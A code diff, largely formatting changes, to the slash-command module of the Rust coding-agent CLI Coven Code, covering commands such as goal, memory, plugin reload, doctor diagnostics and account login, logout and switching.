PrivacySettingsCommand { - fn name(&self) -> &str { "privacy-settings" } - fn description(&self) -> &str { "Open Coven Code privacy settings" } + fn name(&self) -> &str { + "privacy-settings" + } + fn description(&self) -> &str { + "Open Coven Code privacy settings" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { let url = "https://claude.ai/settings/data-privacy-controls"; @@ -1212,9 +1274,15 @@ impl SlashCommand for PrivacySettingsCommand { #[async_trait] impl SlashCommand for VersionCommand { - fn name(&self) -> &str { "version" } - fn aliases(&self) -> Vec<&str> { vec!["v"] } - fn description(&self) -> &str { "Show version information" } + fn name(&self) -> &str { + "version" + } + fn aliases(&self) -> Vec<&str> { + vec!["v"] + } + fn description(&self) -> &str { + "Show version information" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { CommandResult::Message(format!( @@ -1228,9 +1296,15 @@ impl SlashCommand for VersionCommand { #[async_trait] impl SlashCommand for ResumeCommand { - fn name(&self) -> &str { "resume" } - fn aliases(&self) -> Vec<&str> { vec!["r", "continue"] } - fn description(&self) -> &str { "Resume a previous conversation" } + fn name(&self) -> &str { + "resume" + } + fn aliases(&self) -> Vec<&str> { + vec!["r", "continue"] + } + fn description(&self) -> &str { + "Resume a previous conversation" + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { if args.is_empty() { @@ -1241,19 +1315,16 @@ impl SlashCommand for ResumeCommand { let last = &sessions[0]; match claurst_core::history::load_session(&last.id).await { Ok(session) => CommandResult::ResumeSession(session), - Err(e) => CommandResult::Error(format!( - "Failed to load session {}: {}", - last.id, e - )), + Err(e) => { + CommandResult::Error(format!("Failed to load session {}: {}", last.id, e)) + } } } else { match claurst_core::history::load_session(args.trim()).await { Ok(session) => CommandResult::ResumeSession(session), - Err(e) => CommandResult::Error(format!( - "Failed to load session {}: {}", - args.trim(), - e - )), + Err(e) => { + CommandResult::Error(format!("Failed to load session {}: {}", args.trim(), e)) + } } } } @@ -1263,8 +1334,12 @@ impl SlashCommand for ResumeCommand { #[async_trait] impl SlashCommand for StatusCommand { - fn name(&self) -> &str { "status" } - fn description(&self) -> &str { "Show comprehensive system and session status" } + fn name(&self) -> &str { + "status" + } + fn description(&self) -> &str { + "Show comprehensive system and session status" + } async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { // Auth status @@ -1350,8 +1425,12 @@ impl SlashCommand for StatusCommand { #[async_trait] impl SlashCommand for DiffCommand { - fn name(&self) -> &str { "diff" } - fn description(&self) -> &str { "Show git diff of changes in the working directory" } + fn name(&self) -> &str { + "diff" + } + fn description(&self) -> &str { + "Show git diff of changes in the working directory" + } fn help(&self) -> &str { "Usage: /diff [--stat|--staged|]\n\n\ Shows git diff output for the current working directory.\n\n\ @@ -1426,7 +1505,8 @@ fn parse_token_budget(s: &str) -> Option { if s.is_empty() { return None; } - let (num_str, multiplier) = if let Some(n) = s.strip_suffix('K').or_else(|| s.strip_suffix('k')) { + let (num_str, multiplier) = if let Some(n) = s.strip_suffix('K').or_else(|| s.strip_suffix('k')) + { (n, 1_000u64) } else if let Some(n) = s.strip_suffix('M').or_else(|| s.strip_suffix('m')) { (n, 1_000_000u64) @@ -1438,8 +1518,12 @@ fn parse_token_budget(s: &str) -> Option { #[async_trait] impl SlashCommand for GoalCommand { - fn name(&self) -> &str { "goal" } - fn description(&self) -> &str { "Set or manage a durable long-running goal for autonomous work" } + fn name(&self) -> &str { + "goal" + } + fn description(&self) -> &str { + "Set or manage a durable long-running goal for autonomous work" + } fn help(&self) -> &str { "Usage:\n\ /goal — set a new goal and begin working autonomously\n\ @@ -1461,7 +1545,8 @@ impl SlashCommand for GoalCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { if !claurst_core::goals_enabled() { return CommandResult::Message( - "Goals are disabled. Unset COVEN_CODE_GOALS=0 (or remove it) to re-enable.".to_string(), + "Goals are disabled. Unset COVEN_CODE_GOALS=0 (or remove it) to re-enable." + .to_string(), ); } @@ -1491,7 +1576,9 @@ impl SlashCommand for GoalCommand { if let Err(e) = store.set_status(session_id, claurst_core::GoalStatus::Paused) { return CommandResult::Error(format!("Failed to pause goal: {}", e)); } - return CommandResult::Message("Goal paused. Use /goal resume to continue.".to_string()); + return CommandResult::Message( + "Goal paused. Use /goal resume to continue.".to_string(), + ); } "resume" => { let store = match open_goal_store() { @@ -1513,7 +1600,9 @@ impl SlashCommand for GoalCommand { if let Err(e) = store.set_status(session_id, claurst_core::GoalStatus::Active) { return CommandResult::Error(format!("Failed to resume goal: {}", e)); } - return CommandResult::Message("Goal resumed. Coven Code will continue on the next message.".to_string()); + return CommandResult::Message( + "Goal resumed. Coven Code will continue on the next message.".to_string(), + ); } "clear" => { let store = match open_goal_store() { @@ -1582,12 +1671,9 @@ impl SlashCommand for GoalCommand { }; match store.set_goal(session_id, objective, token_budget) { - Err(claurst_core::GoalError::ObjectiveTooLong { len, max }) => { - CommandResult::Error(format!( - "Objective too long ({} chars). Max {} chars.", - len, max - )) - } + Err(claurst_core::GoalError::ObjectiveTooLong { len, max }) => CommandResult::Error( + format!("Objective too long ({} chars). Max {} chars.", len, max), + ), Err(e) => CommandResult::Error(format!("Failed to set goal: {}", e)), Ok(goal) => { // Return UserMessage so the query loop fires immediately and the @@ -1609,9 +1695,9 @@ fn goal_status(session_id: &str) -> CommandResult { None => return CommandResult::Error("Could not open goal store.".to_string()), }; match store.get_goal(session_id) { - None => CommandResult::Message( - "No active goal. Set one with:\n /goal ".to_string(), - ), + None => { + CommandResult::Message("No active goal. Set one with:\n /goal ".to_string()) + } Some(g) => { let budget_line = g .budget_display() @@ -1638,8 +1724,12 @@ fn goal_status(session_id: &str) -> CommandResult { #[async_trait] impl SlashCommand for MemoryCommand { - fn name(&self) -> &str { "memory" } - fn description(&self) -> &str { "View, edit, or clear AGENTS.md memory files" } + fn name(&self) -> &str { + "memory" + } + fn description(&self) -> &str { + "View, edit, or clear AGENTS.md memory files" + } fn help(&self) -> &str { "Usage: /memory [edit|clear] [global]\n\n\ Shows the content of AGENTS.md files that provide project context to Coven Code.\n\ @@ -1666,7 +1756,10 @@ impl SlashCommand for MemoryCommand { .join("AGENTS.md"); let locations = [ - ("project (.coven-code/AGENTS.md)", project_claude_dir.clone()), + ( + "project (.coven-code/AGENTS.md)", + project_claude_dir.clone(), + ), ("project (AGENTS.md)", project_root.clone()), ("global (~/.coven-code/AGENTS.md)", global_path.clone()), ]; @@ -1675,7 +1768,10 @@ impl SlashCommand for MemoryCommand { // ---- /memory edit [global|project] ------------------------------------ if cmd == "edit" || cmd.starts_with("edit ") { - let target_hint = cmd.strip_prefix("edit").map(|s| s.trim()).unwrap_or("project"); + let target_hint = cmd + .strip_prefix("edit") + .map(|s| s.trim()) + .unwrap_or("project"); let target = match target_hint { "global" => { // Ensure global dir exists @@ -1716,11 +1812,10 @@ impl SlashCommand for MemoryCommand { } else if let Ok(ed) = std::env::var("EDITOR") { format!("Using $EDITOR=\"{}\".", ed) } else { - "To use a different editor, set the $EDITOR or $VISUAL environment variable.".to_string() + "To use a different editor, set the $EDITOR or $VISUAL environment variable." + .to_string() }; - let spawn_result = std::process::Command::new(&editor) - .arg(&target) - .status(); + let spawn_result = std::process::Command::new(&editor).arg(&target).status(); return match spawn_result { Ok(_) => CommandResult::Message(format!( "Opened {} in your editor.\n{}", @@ -1729,19 +1824,28 @@ impl SlashCommand for MemoryCommand { )), Err(e) => CommandResult::Message(format!( "Could not launch '{}': {}. Edit {} manually.\n{}", - editor, e, target.display(), editor_hint + editor, + e, + target.display(), + editor_hint )), }; } // ---- /memory clear [global|project] ----------------------------------- if cmd == "clear" || cmd.starts_with("clear ") { - let target_hint = cmd.strip_prefix("clear").map(|s| s.trim()).unwrap_or("project"); + let target_hint = cmd + .strip_prefix("clear") + .map(|s| s.trim()) + .unwrap_or("project"); let (label, target) = match target_hint { "global" => ("global (~/.coven-code/AGENTS.md)", global_path.clone()), _ => { if project_claude_dir.exists() { - ("project (.coven-code/AGENTS.md)", project_claude_dir.clone()) + ( + "project (.coven-code/AGENTS.md)", + project_claude_dir.clone(), + ) } else { ("project (AGENTS.md)", project_root.clone()) } @@ -1760,9 +1864,9 @@ impl SlashCommand for MemoryCommand { label, target.display() )), - Err(e) => CommandResult::Error(format!( - "Failed to clear {}: {}", target.display(), e - )), + Err(e) => { + CommandResult::Error(format!("Failed to clear {}: {}", target.display(), e)) + } }; } @@ -1786,7 +1890,11 @@ impl SlashCommand for MemoryCommand { lines = lines, chars = chars, content = if content.len() > 2000 { - format!("{}…\n(truncated — file is {} chars)", &content[..2000], chars) + format!( + "{}…\n(truncated — file is {} chars)", + &content[..2000], + chars + ) } else { content.clone() } @@ -1794,7 +1902,9 @@ impl SlashCommand for MemoryCommand { } Err(e) => output.push_str(&format!( "\n[{label}] — Error reading {}: {}\n", - path.display(), e, label = label + path.display(), + e, + label = label )), } } @@ -1804,7 +1914,7 @@ impl SlashCommand for MemoryCommand { output.push_str( "\nNo AGENTS.md files found.\n\ Use /init to create one in the current project.\n\ - Use /memory edit to create and open a memory file." + Use /memory edit to create and open a memory file.", ); } else { output.push_str( @@ -1812,7 +1922,7 @@ impl SlashCommand for MemoryCommand { /memory edit — edit project AGENTS.md\n\ /memory edit global — edit global ~/.coven-code/AGENTS.md\n\ /memory clear — clear project AGENTS.md\n\ - /memory clear global — clear global AGENTS.md" + /memory clear global — clear global AGENTS.md", ); } @@ -1824,10 +1934,18 @@ impl SlashCommand for MemoryCommand { #[async_trait] impl SlashCommand for BugCommand { - fn name(&self) -> &str { "feedback" } - fn aliases(&self) -> Vec<&str> { vec!["bug"] } - fn description(&self) -> &str { "Submit feedback about Coven Code" } - fn help(&self) -> &str { "Usage: /feedback [report]" } + fn name(&self) -> &str { + "feedback" + } + fn aliases(&self) -> Vec<&str> { + vec!["bug"] + } + fn description(&self) -> &str { + "Submit feedback about Coven Code" + } + fn help(&self) -> &str { + "Usage: /feedback [report]" + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let report = args.trim(); @@ -1849,8 +1967,12 @@ impl SlashCommand for BugCommand { #[async_trait] impl SlashCommand for UsageCommand { - fn name(&self) -> &str { "usage" } - fn description(&self) -> &str { "Show API usage, quotas, and rate limit status" } + fn name(&self) -> &str { + "usage" + } + fn description(&self) -> &str { + "Show API usage, quotas, and rate limit status" + } fn help(&self) -> &str { "Usage: /usage\n\n\ Shows current session API usage and account quota information.\n\ @@ -1909,11 +2031,50 @@ impl SlashCommand for UsageCommand { // ---- /plugin ------------------------------------------------------------- +async fn loaded_plugin_registry(project_dir: &std::path::Path) -> claurst_plugins::PluginRegistry { + if let Some(global) = claurst_plugins::global_plugin_registry() { + (*global).clone() + } else { + let registry = claurst_plugins::load_plugins(project_dir, &[]).await; + publish_plugin_registry(®istry); + registry + } +} + +fn publish_plugin_registry(registry: &claurst_plugins::PluginRegistry) { + claurst_plugins::set_global_hooks(registry.build_hook_registry()); + claurst_plugins::set_global_registry(registry.clone()); +} + +fn merge_plugin_mcp_servers( + config: &mut claurst_core::config::Config, + registry: &claurst_plugins::PluginRegistry, +) -> usize { + let mut existing_names: std::collections::HashSet = + config.mcp_servers.iter().map(|s| s.name.clone()).collect(); + let mut added = 0; + + for mcp_server in registry.all_mcp_servers() { + if existing_names.insert(mcp_server.name.clone()) { + config.mcp_servers.push(mcp_server); + added += 1; + } + } + + added +} + #[async_trait] impl SlashCommand for PluginCommand { - fn name(&self) -> &str { "plugin" } - fn aliases(&self) -> Vec<&str> { vec!["plugins"] } - fn description(&self) -> &str { "Manage plugins" } + fn name(&self) -> &str { + "plugin" + } + fn aliases(&self) -> Vec<&str> { + vec!["plugins"] + } + fn description(&self) -> &str { + "Manage plugins" + } fn help(&self) -> &str { "Usage: /plugin [list|info |enable |disable |install |reload]\n\ Manage Coven Code plugins.\n\n\ @@ -1930,26 +2091,10 @@ impl SlashCommand for PluginCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let project_dir = ctx.working_dir.clone(); - // Helper: prefer the already-loaded global registry, falling back to a - // fresh disk scan so the command still works without the global being set. - async fn get_registry( - project_dir: &std::path::Path, - ) -> claurst_plugins::PluginRegistry { - if let Some(global) = claurst_plugins::global_plugin_registry() { - let mut reg = claurst_plugins::PluginRegistry::new(); - for p in global.all() { - reg.insert(p.clone()); - } - reg - } else { - claurst_plugins::load_plugins(project_dir, &[]).await - } - } - let parsed = claurst_plugins::parse_plugin_args(args); match parsed { claurst_plugins::PluginSubCommand::List => { - let registry = get_registry(&project_dir).await; + let registry = loaded_plugin_registry(&project_dir).await; CommandResult::Message(claurst_plugins::format_plugin_list(®istry)) } claurst_plugins::PluginSubCommand::Enable(ref name) if name.is_empty() => { @@ -1959,7 +2104,7 @@ impl SlashCommand for PluginCommand { ) } claurst_plugins::PluginSubCommand::Enable(name) => { - let registry = get_registry(&project_dir).await; + let registry = loaded_plugin_registry(&project_dir).await; if registry.get(&name).is_none() { return CommandResult::Error(format!( "Plugin '{}' not found. Use `/plugin list` to see installed plugins.", @@ -1982,7 +2127,7 @@ impl SlashCommand for PluginCommand { ) } claurst_plugins::PluginSubCommand::Disable(name) => { - let registry = get_registry(&project_dir).await; + let registry = loaded_plugin_registry(&project_dir).await; if registry.get(&name).is_none() { return CommandResult::Error(format!( "Plugin '{}' not found. Use `/plugin list` to see installed plugins.", @@ -2005,7 +2150,7 @@ impl SlashCommand for PluginCommand { ) } claurst_plugins::PluginSubCommand::Info(name) => { - let registry = get_registry(&project_dir).await; + let registry = loaded_plugin_registry(&project_dir).await; CommandResult::Message(claurst_plugins::format_plugin_info(®istry, &name)) } claurst_plugins::PluginSubCommand::Install(ref path) if path.is_empty() => { @@ -2015,9 +2160,7 @@ impl SlashCommand for PluginCommand { ) } claurst_plugins::PluginSubCommand::Install(path) => { - let result = claurst_plugins::install_plugin_from_path( - std::path::Path::new(&path), - ); + let result = claurst_plugins::install_plugin_from_path(std::path::Path::new(&path)); match result { Ok(name) => CommandResult::Message(format!( "Plugin '{}' installed successfully. Run `/plugin reload` to activate it.", @@ -2027,14 +2170,16 @@ impl SlashCommand for PluginCommand { } } claurst_plugins::PluginSubCommand::Reload => { - let old_registry = get_registry(&project_dir).await; + let old_registry = loaded_plugin_registry(&project_dir).await; let (new_registry, diff) = claurst_plugins::reload_plugins(&old_registry, &project_dir, &[]).await; - CommandResult::Message(claurst_plugins::format_reload_summary(&new_registry, &diff)) + merge_plugin_mcp_servers(&mut ctx.config, &new_registry); + let summary = claurst_plugins::format_reload_summary(&new_registry, &diff); + publish_plugin_registry(&new_registry); + CommandResult::Message(summary) } - claurst_plugins::PluginSubCommand::Help => { - CommandResult::Message( - "Plugin commands:\n\ + claurst_plugins::PluginSubCommand::Help => CommandResult::Message( + "Plugin commands:\n\ /plugin — list all installed plugins\n\ /plugin list — list all installed plugins\n\ /plugin info — show plugin details\n\ @@ -2042,9 +2187,8 @@ impl SlashCommand for PluginCommand { /plugin disable — disable a plugin\n\ /plugin install — install plugin from local path\n\ /plugin reload — reload plugins from disk" - .to_string(), - ) - } + .to_string(), + ), } } } @@ -2053,8 +2197,12 @@ impl SlashCommand for PluginCommand { #[async_trait] impl SlashCommand for ReloadPluginsCommand { - fn name(&self) -> &str { "reload-plugins" } - fn description(&self) -> &str { "Reload all plugins without restarting" } + fn name(&self) -> &str { + "reload-plugins" + } + fn description(&self) -> &str { + "Reload all plugins without restarting" + } fn help(&self) -> &str { "Usage: /reload-plugins\n\ Reloads all plugins and shows what changed." @@ -2063,11 +2211,14 @@ impl SlashCommand for ReloadPluginsCommand { async fn execute(&self, _args: &str, ctx: &mut CommandContext) -> CommandResult { let project_dir = ctx.working_dir.clone(); - let old_registry = claurst_plugins::load_plugins(&project_dir, &[]).await; + let old_registry = loaded_plugin_registry(&project_dir).await; let (new_registry, diff) = claurst_plugins::reload_plugins(&old_registry, &project_dir, &[]).await; + merge_plugin_mcp_servers(&mut ctx.config, &new_registry); + let summary = claurst_plugins::format_reload_summary(&new_registry, &diff); + publish_plugin_registry(&new_registry); - CommandResult::Message(claurst_plugins::format_reload_summary(&new_registry, &diff)) + CommandResult::Message(summary) } } @@ -2129,14 +2280,15 @@ impl SlashCommand for PluginSlashCommandAdapter { } else { format!("{} {}", command, args) }; - let cmd_result = std::process::Command::new(if cfg!(windows) { "cmd" } else { "sh" }) - .args(if cfg!(windows) { - vec!["/C", &full_cmd] - } else { - vec!["-c", &full_cmd] - }) - .env("CLAUDE_PLUGIN_ROOT", plugin_root) - .output(); + let cmd_result = + std::process::Command::new(if cfg!(windows) { "cmd" } else { "sh" }) + .args(if cfg!(windows) { + vec!["/C", &full_cmd] + } else { + vec!["-c", &full_cmd] + }) + .env("CLAUDE_PLUGIN_ROOT", plugin_root) + .output(); match cmd_result { Ok(out) => { let stdout = String::from_utf8_lossy(&out.stdout); @@ -2158,8 +2310,12 @@ impl SlashCommand for PluginSlashCommandAdapter { #[async_trait] impl SlashCommand for DoctorCommand { - fn name(&self) -> &str { "doctor" } - fn description(&self) -> &str { "Check system health and diagnose issues" } + fn name(&self) -> &str { + "doctor" + } + fn description(&self) -> &str { + "Check system health and diagnose issues" + } fn help(&self) -> &str { "Usage: /doctor\n\ Runs a comprehensive system diagnostics check:\n\ @@ -2185,14 +2341,19 @@ impl SlashCommand for DoctorCommand { // ── API / Auth ────────────────────────────────────────────────────── lines.push("Authentication".to_string()); - let anthropic_auth = ctx.config.resolve_anthropic_auth_async().await.unwrap_or((String::new(), false)); + let anthropic_auth = ctx + .config + .resolve_anthropic_auth_async() + .await + .unwrap_or((String::new(), false)); let client_config = claurst_api::client::ClientConfig { api_key: anthropic_auth.0, api_base: ctx.config.resolve_anthropic_api_base(), use_bearer_auth: anthropic_auth.1, ..Default::default() }; - let provider_registry = claurst_api::ProviderRegistry::from_config(&ctx.config, client_config); + let provider_registry = + claurst_api::ProviderRegistry::from_config(&ctx.config, client_config); let provider_id = claurst_core::ProviderId::new(ctx.config.selected_provider_id()); match provider_registry.get(&provider_id) { Some(provider) => match provider.health_check().await { @@ -2203,10 +2364,18 @@ impl SlashCommand for DoctorCommand { lines.push(format!(" ⚠ {} is degraded: {}", provider.name(), reason)); } Ok(claurst_api::provider_types::ProviderStatus::Unavailable { reason }) => { - lines.push(format!(" ✗ {} is unavailable: {}", provider.name(), reason)); + lines.push(format!( + " ✗ {} is unavailable: {}", + provider.name(), + reason + )); } Err(err) => { - lines.push(format!(" ✗ {} health check failed: {}", provider.name(), err)); + lines.push(format!( + " ✗ {} health check failed: {}", + provider.name(), + err + )); } }, None => { @@ -2222,7 +2391,10 @@ impl SlashCommand for DoctorCommand { } } // Show which model is active - lines.push(format!(" • Active model: {}", ctx.config.effective_model())); + lines.push(format!( + " • Active model: {}", + ctx.config.effective_model() + )); lines.push(String::new()); // ── Git ───────────────────────────────────────────────────────────── @@ -2254,7 +2426,9 @@ impl SlashCommand for DoctorCommand { .to_string(); lines.push(format!(" ✓ ripgrep: {first}")); } - _ => lines.push(" ⚠ ripgrep (rg) not found — Grep tool will fall back to built-in".to_string()), + _ => lines.push( + " ⚠ ripgrep (rg) not found — Grep tool will fall back to built-in".to_string(), + ), } lines.push(String::new()); @@ -2331,10 +2505,10 @@ impl SlashCommand for DoctorCommand { .and_then(|s| serde_json::from_str::(&s).ok()) { Some(_) => lines.push( - " ⚠ settings.json is JSON but has unexpected structure".to_string() + " ⚠ settings.json is JSON but has unexpected structure".to_string(), ), None => lines.push( - " ✗ settings.json is invalid JSON — run /config to repair".to_string() + " ✗ settings.json is invalid JSON — run /config to repair".to_string(), ), } } @@ -2348,7 +2522,9 @@ impl SlashCommand for DoctorCommand { if claude_md.exists() { lines.push(" ✓ AGENTS.md present in working directory".to_string()); } else { - lines.push(" • No AGENTS.md in working directory (run /init to create one)".to_string()); + lines.push( + " • No AGENTS.md in working directory (run /init to create one)".to_string(), + ); } lines.push(String::new()); @@ -2363,13 +2539,19 @@ impl SlashCommand for DoctorCommand { for srv in ctx.config.mcp_servers.iter().take(12) { let status_str = match statuses.get(&srv.name) { Some(claurst_mcp::McpServerStatus::Connected { tool_count }) => { - format!(" ✓ {} — connected ({} tool{})", - srv.name, tool_count, if *tool_count == 1 { "" } else { "s" }) + format!( + " ✓ {} — connected ({} tool{})", + srv.name, + tool_count, + if *tool_count == 1 { "" } else { "s" } + ) } Some(claurst_mcp::McpServerStatus::Connecting) => { format!(" ⚠ {} — connecting…", srv.name) } - Some(claurst_mcp::McpServerStatus::Disconnected { last_error: Some(e) }) => { + Some(claurst_mcp::McpServerStatus::Disconnected { + last_error: Some(e), + }) => { format!(" ✗ {} — failed: {}", srv.name, e) } Some(claurst_mcp::McpServerStatus::Disconnected { last_error: None }) => { @@ -2387,7 +2569,9 @@ impl SlashCommand for DoctorCommand { } } else { // No live manager — just show configured names - lines.push(format!(" ✓ {mcp_count} MCP server(s) configured (not yet connected):")); + lines.push(format!( + " ✓ {mcp_count} MCP server(s) configured (not yet connected):" + )); for srv in ctx.config.mcp_servers.iter().take(8) { lines.push(format!(" - {}", srv.name)); } @@ -2403,30 +2587,35 @@ impl SlashCommand for DoctorCommand { if hook_count == 0 { lines.push(" • No hooks configured".to_string()); } else { - lines.push(format!(" ✓ {hook_count} hook(s) configured across {} event(s)", - ctx.config.hooks.len())); + lines.push(format!( + " ✓ {hook_count} hook(s) configured across {} event(s)", + ctx.config.hooks.len() + )); } lines.push(String::new()); // ── Tool permissions ───────────────────────────────────────────────── lines.push("Tool Permissions".to_string()); - let all_tool_names: Vec = claurst_tools::all_tools() - .iter() - .map(|t| t.name().to_string()) - .collect(); + let all_tool_names = claurst_tools::all_tool_names(); let total_tools = all_tool_names.len(); let allowed_count = ctx.config.allowed_tools.len(); let denied_count = ctx.config.disallowed_tools.len(); // Tools not in allowed or denied lists require user confirmation - let explicit_tools: std::collections::HashSet<&str> = ctx.config.allowed_tools.iter() + let explicit_tools: std::collections::HashSet<&str> = ctx + .config + .allowed_tools + .iter() .chain(ctx.config.disallowed_tools.iter()) .map(|s| s.as_str()) .collect(); - let confirm_count = all_tool_names.iter() - .filter(|n| !explicit_tools.contains(n.as_str())) + let confirm_count = all_tool_names + .iter() + .filter(|n| !explicit_tools.contains(**n)) .count(); let mode_label = match ctx.config.permission_mode { - claurst_core::PermissionMode::BypassPermissions => "bypass-permissions (no confirmation required)", + claurst_core::PermissionMode::BypassPermissions => { + "bypass-permissions (no confirmation required)" + } claurst_core::PermissionMode::AcceptEdits => "accept-edits (file edits auto-approved)", claurst_core::PermissionMode::Plan => "plan (read-only, no writes)", claurst_core::PermissionMode::Default => "default (confirm destructive actions)", @@ -2434,17 +2623,24 @@ impl SlashCommand for DoctorCommand { lines.push(format!(" • Mode: {mode_label}")); lines.push(format!(" • Total built-in tools: {total_tools}")); if allowed_count > 0 { - lines.push(format!(" ✓ Always allowed: {} tool(s) — {}", + lines.push(format!( + " ✓ Always allowed: {} tool(s) — {}", allowed_count, - ctx.config.allowed_tools.join(", "))); + ctx.config.allowed_tools.join(", ") + )); } if denied_count > 0 { - lines.push(format!(" ✗ Always denied: {} tool(s) — {}", + lines.push(format!( + " ✗ Always denied: {} tool(s) — {}", denied_count, - ctx.config.disallowed_tools.join(", "))); + ctx.config.disallowed_tools.join(", ") + )); } if ctx.config.permission_mode == claurst_core::PermissionMode::Default { - lines.push(format!(" ⚠ Require confirmation: {} tool(s)", confirm_count)); + lines.push(format!( + " ⚠ Require confirmation: {} tool(s)", + confirm_count + )); } lines.push(String::new()); @@ -2467,8 +2663,12 @@ impl SlashCommand for DoctorCommand { #[async_trait] impl SlashCommand for LoginCommand { - fn name(&self) -> &str { "login" } - fn description(&self) -> &str { "Authenticate with Anthropic or Codex (multi-account)" } + fn name(&self) -> &str { + "login" + } + fn description(&self) -> &str { + "Authenticate with Anthropic or Codex (multi-account)" + } fn help(&self) -> &str { "Usage: /login [--console] [--codex] [--label ]\n\n\ Start an OAuth login. By default authenticates with Claude.ai. Pass\n\ @@ -2479,8 +2679,8 @@ impl SlashCommand for LoginCommand { async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let tokens: Vec<&str> = args.split_whitespace().collect(); - let use_codex = tokens.iter().any(|t| *t == "--codex"); - let login_with_claude_ai = !tokens.iter().any(|t| *t == "--console"); + let use_codex = tokens.contains(&"--codex"); + let login_with_claude_ai = !tokens.contains(&"--console"); let label = parse_label_arg(&tokens); let provider = if use_codex { @@ -2514,8 +2714,12 @@ fn parse_label_arg(tokens: &[&str]) -> Option { #[async_trait] impl SlashCommand for LogoutCommand { - fn name(&self) -> &str { "logout" } - fn description(&self) -> &str { "Clear credentials for the active account" } + fn name(&self) -> &str { + "logout" + } + fn description(&self) -> &str { + "Clear credentials for the active account" + } fn help(&self) -> &str { "Usage: /logout [--codex] [--all]\n\n\ By default removes the active Anthropic account. `--codex` targets\n\ @@ -2525,8 +2729,8 @@ impl SlashCommand for LogoutCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let tokens: Vec<&str> = args.split_whitespace().collect(); - let use_codex = tokens.iter().any(|t| *t == "--codex"); - let purge_all = tokens.iter().any(|t| *t == "--all"); + let use_codex = tokens.contains(&"--codex"); + let purge_all = tokens.contains(&"--all"); if use_codex { if purge_all { @@ -2561,7 +2765,9 @@ impl SlashCommand for LogoutCommand { for id in &ids { let _ = registry.remove(claurst_core::accounts::PROVIDER_ANTHROPIC, id); } - let mut settings = claurst_core::config::Settings::load().await.unwrap_or_default(); + let mut settings = claurst_core::config::Settings::load() + .await + .unwrap_or_default(); settings.config.api_key = None; let _ = settings.save().await; ctx.config.api_key = None; @@ -2574,7 +2780,9 @@ impl SlashCommand for LogoutCommand { if let Err(e) = claurst_core::oauth::OAuthTokens::clear().await { return CommandResult::Error(format!("Failed to clear OAuth tokens: {}", e)); } - let mut settings = claurst_core::config::Settings::load().await.unwrap_or_default(); + let mut settings = claurst_core::config::Settings::load() + .await + .unwrap_or_default(); settings.config.api_key = None; if let Err(e) = settings.save().await { return CommandResult::Error(format!("Failed to update settings: {}", e)); @@ -2590,8 +2798,12 @@ pub struct AccountsCommand; #[async_trait] impl SlashCommand for AccountsCommand { - fn name(&self) -> &str { "accounts" } - fn description(&self) -> &str { "List stored Anthropic and Codex accounts" } + fn name(&self) -> &str { + "accounts" + } + fn description(&self) -> &str { + "List stored Anthropic and Codex accounts" + } fn help(&self) -> &str { "Usage: /accounts\n\n\ Lists every stored Anthropic and Codex account along with the\n\ @@ -2637,8 +2849,12 @@ pub struct SwitchCommand; #[async_trait] impl SlashCommand for SwitchCommand { - fn name(&self) -> &str { "switch" } - fn description(&self) -> &str { "Switch the active account for a provider" } + fn name(&self) -> &str { + "switch" + } + fn description(&self) -> &str { + "Switch the active account for a provider" + } fn help(&self) -> &str { "Usage: /switch [--codex] \n\n\ Make a stored account active. Defaults to Anthropic; pass `--codex`\n\ @@ -2648,7 +2864,7 @@ impl SlashCommand for SwitchCommand { async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let tokens: Vec<&str> = args.split_whitespace().collect(); - let use_codex = tokens.iter().any(|t| *t == "--codex"); + let use_codex = tokens.contains(&"--codex"); let provider = if use_codex { claurst_core::accounts::PROVIDER_CODEX } else { @@ -2666,10 +2882,9 @@ impl SlashCommand for SwitchCommand { let mut registry = claurst_core::accounts::AccountRegistry::load(); match registry.switch_to(provider, id) { - Ok(()) => CommandResult::Message(format!( - "Switched {} active account to '{}'.", - display, id - )), + Ok(()) => { + CommandResult::Message(format!("Switched {} active account to '{}'.", display, id)) + } Err(e) => CommandResult::Error(format!("{}", e)), } } @@ -2679,8 +2894,12 @@ impl SlashCommand for SwitchCommand { #[async_trait] impl SlashCommand for RefreshCommand { - fn name(&self) -> &str { "refresh" } - fn description(&self) -> &str { "Clear saved provider auth and model caches" } + fn name(&self) -> &str { + "refresh" + } + fn description(&self) -> &str { + "Clear saved provider auth and model caches" + } fn help(&self) -> &str { "Usage: /refresh\n\n\ Clears saved provider credentials, provider/model selection, and model caches, then rebuilds the live runtime state.\n\ @@ -2712,8 +2931,12 @@ fn parse_speech_level(args: &str) -> String { #[async_trait] impl SlashCommand for CavemanCommand { - fn name(&self) -> &str { "caveman" } - fn description(&self) -> &str { "Caveman speech mode — why use many token when few token do trick" } + fn name(&self) -> &str { + "caveman" + } + fn description(&self) -> &str { + "Caveman speech mode — why use many token when few token do trick" + } fn help(&self) -> &str { "Usage: /caveman [lite|full|ultra]\n\n\ Activates caveman speech mode that cuts ~75% of output tokens.\n\ @@ -2724,14 +2947,21 @@ impl SlashCommand for CavemanCommand { } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let level = parse_speech_level(args); - CommandResult::SpeechMode { mode: Some("caveman".to_string()), level } + CommandResult::SpeechMode { + mode: Some("caveman".to_string()), + level, + } } } #[async_trait] impl SlashCommand for RockyCommand { - fn name(&self) -> &str { "rocky" } - fn description(&self) -> &str { "Rocky speech mode — Eridian alien engineer from Project Hail Mary. Save big token. Good good good." } + fn name(&self) -> &str { + "rocky" + } + fn description(&self) -> &str { + "Rocky speech mode — Eridian alien engineer from Project Hail Mary. Save big token. Good good good." + } fn help(&self) -> &str { "Usage: /rocky [lite|full|ultra]\n\n\ Speak like Rocky from Project Hail Mary. Saves big token. Amaze amaze amaze.\n\ @@ -2742,19 +2972,29 @@ impl SlashCommand for RockyCommand { } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let level = parse_speech_level(args); - CommandResult::SpeechMode { mode: Some("rocky".to_string()), level } + CommandResult::SpeechMode { + mode: Some("rocky".to_string()), + level, + } } } 